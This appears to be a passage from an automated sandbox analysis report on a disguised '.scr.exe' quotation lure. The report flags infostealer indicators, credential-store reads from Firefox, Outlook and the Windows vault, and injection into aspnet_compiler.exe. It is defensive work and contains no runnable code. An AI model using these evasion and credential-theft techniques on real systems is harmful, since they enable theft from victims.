                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename32d812a2-6155-49e6-a2cc-198731b31182.exe4 vs QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1919160150.0000000004A01000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWdfagb.dll" vs QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1916468212.00000000011BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000007027000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000007156000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename32d812a2-6155-49e6-a2cc-198731b31182.exe4 vs QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.00000000069D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWdfagb.dll" vs QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000000.1423019604.0000000000C3D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDqdwr.exe> vs QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.00000000070DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000030CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exeBinary or memory string: OriginalFilenameDqdwr.exe> vs QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 6.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/2
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION_JULQTRA071244#U00faPDF.scr.exe.logJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: NULL
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002EAC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exeReversingLabs: Detection: 52%
                    Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe "C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe"
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1927211181.00000000063A0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000007027000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.00000000070DF000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1927211181.00000000063A0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000007027000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.00000000070DF000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, GlobalRegExporter.cs.Net Code: ViewReg
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, StrategyProperty.cs.Net Code: PopOrder System.AppDomain.Load(byte[])
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.70df7c8.12.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.8150000.17.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.8150000.17.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.8150000.17.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.8150000.17.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.8150000.17.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6f54cc0.4.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6f54cc0.4.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6f54cc0.4.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6f54cc0.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6f54cc0.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6fa4ce0.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6fa4ce0.5.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6fa4ce0.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6fa4ce0.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6fa4ce0.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6dace20.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6dd4e40.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6dd4e40.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.80e0000.16.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6ec4e80.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6e24e60.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6dace20.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1940288788.00000000080E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1917437133.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1928437067.00000000069D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: QUOTATION_JULQTRA071244#U00faPDF.scr.exe PID: 7612, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DFC970 push 8B6FA6E7h; iretd 0_2_02DFC975
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_08A46C4D push edi; ret 0_2_08A46C4E
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
